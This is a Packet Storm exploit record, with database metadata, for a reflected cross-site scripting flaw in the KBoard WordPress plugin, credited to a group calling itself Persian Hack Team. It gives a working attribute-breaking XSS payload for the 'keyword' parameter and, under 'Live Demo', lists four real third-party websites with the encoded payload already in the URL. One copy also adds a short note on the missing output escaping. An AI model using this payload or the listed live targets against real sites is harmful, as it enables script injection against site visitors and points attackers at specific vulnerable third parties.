ID PACKETSTORM:138917
Type packetstorm
Reporter T3NZOG4N
Modified 2016-09-30T00:00:00
Description
`######################
# Exploit Title : WordPress Plugin KBoard - Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.cosmosfarm.com/products/kboard
# Category [ Webapps ]
# Tested on [ Win ]
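# Version : Before 4.4 (affected versions; this advisory names no fixed release, so confirm against the vendor changelog before treating 4.4 as patched)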
# Date 2016/09/26
######################
#
# PoC
# =>Cross Site Scripting :
#
# Payload : 1" onmouseover=prompt("Persian") bad="
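# Vulnerable parameter : keyword (reflected XSS)
# The payload closes a double-quoted HTML attribute, which suggests board.php echoes the keyword value into an attribute without escaping; encoding it for the attribute context on output (e.g. esc_attr() in WordPress) addresses this.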
# Demo :
# http://www.site.com/wp-content/plugins/kboard/board.php?pageid=1&board_id=1&mod=list&target=&keyword=1" onmouseover=prompt("Persian") bad="
#
# Live Demo :
#
# http://www.vocalcoachjoe.com/wp-content/plugins/kboard/board.php?pageid=1&board_id=1&mod=list&target=&keyword=1%22+onmouseover%3Dprompt%28%22Persian%22%29+bad%3D%22
#
# http://www.dbvalley.com/wp-content/plugins/kboard/board.php?board_id=1&mod=list&target=&keyword=1%22+onmouseover%3Dprompt%28%22Persian%22%29+bad%3D%22
#
# http://www.shinhan.ca/wp-content/plugins/kboard/board.php?board_id=1&mod=list&target=&keyword=1%22+onmouseover%3Dprompt%28%22Persian%22%29+bad%3D%22
#
# http://www.dhcmooncake.com/wp-content/plugins/kboard/board.php?board_id=2&pageid=1&mod=list&target=&keyword=1%22+onmouseover%3Dprompt%28%22Persian%22%29+bad%3D%22
#
######################
# Discovered by : FireKernel & T3NZOG4N & Mojtaba MobhaM
# B3li3v3 M3 I will n3v3r St0p
# Greetz : Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R $ Mr_Mask_Black And All Persian Hack Team Members
# Homepage : http://persian-team.ir
######################
`
{"type": "packetstorm", "published": "2016-09-30T00:00:00", "reporter": "T3NZOG4N", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "80083886918bcd070b91c6aa5be9e6b8"}, {"key": "modified", "hash": "9363ed4f628af1fd2e7e39ddc1937567"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "9363ed4f628af1fd2e7e39ddc1937567"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "caa4965f28ee57b36039459276587d74"}, {"key": "sourceData", "hash": "8ce67f20ef18ae998bd2180821a6aec2"}, {"key": "sourceHref", "hash": "9f2e04ac2615d57b7827ddd370c33461"}, {"key": "title", "hash": "11f7f256bf80529f5db60351c8b3c83a"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`###################### \n# Exploit Title : WordPress Plugin KBoard - Cross Site Scripting \n# Exploit Author : Persian Hack Team \n# Vendor Homepage : http://www.cosmosfarm.com/products/kboard \n# Category [ Webapps ] \n# Tested on [ Win ] \n# Version : Before 4.4 \n# Date 2016/09/26 \n###################### \n# \n# PoC \n# =>Cross Site Scripting : \n# \n# Payload : 1\" onmouseover=prompt(\"Persian\") bad=\" \n# Keyword Vulnerable To XSS \n# Demo : \n# http://www.site.com/wp-content/plugins/kboard/board.php?pageid=1&board_id=1&mod=list&target=&keyword=1\" onmouseover=prompt(\"Persian\") bad=\" \n# \n# Live Demo : \n# \n# http://www.vocalcoachjoe.com/wp-content/plugins/kboard/board.php?pageid=1&board_id=1&mod=list&target=&keyword=1%22+onmouseover%3Dprompt%28%22Persian%22%29+bad%3D%22 \n# \n# 
http://www.dbvalley.com/wp-content/plugins/kboard/board.php?board_id=1&mod=list&target=&keyword=1%22+onmouseover%3Dprompt%28%22Persian%22%29+bad%3D%22 \n# \n# http://www.shinhan.ca/wp-content/plugins/kboard/board.php?board_id=1&mod=list&target=&keyword=1%22+onmouseover%3Dprompt%28%22Persian%22%29+bad%3D%22 \n# \n# http://www.dhcmooncake.com/wp-content/plugins/kboard/board.php?board_id=2&pageid=1&mod=list&target=&keyword=1%22+onmouseover%3Dprompt%28%22Persian%22%29+bad%3D%22 \n# \n###################### \n# Discovered by : FireKernel & T3NZOG4N & Mojtaba MobhaM \n# B3li3v3 M3 I will n3v3r St0p \n# Greetz : Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R $ Mr_Mask_Black And All Persian Hack Team Members \n# Homepage : http://persian-team.ir \n###################### \n`\n", "viewCount": 2, "history": [], "lastseen": "2016-11-03T10:18:45", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/138917/WordPress-KBoard-Cross-Site-Scripting.html", "sourceHref": "https://packetstormsecurity.com/files/download/138917/wpkboard-xss.txt", "title": "WordPress KBoard Cross Site Scripting", "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2016-11-03T10:18:45"}, "dependencies": {"references": [], "modified": "2016-11-03T10:18:45"}, "vulnersScore": -0.2}, "references": [], "id": "PACKETSTORM:138917", "hash": "05cc3ddbd69f875a648ef4cebf2314516472d5cd491b910c914d0be81ed3603b", "edition": 1, "cvelist": [], "modified": "2016-09-30T00:00:00", "description": ""}
{}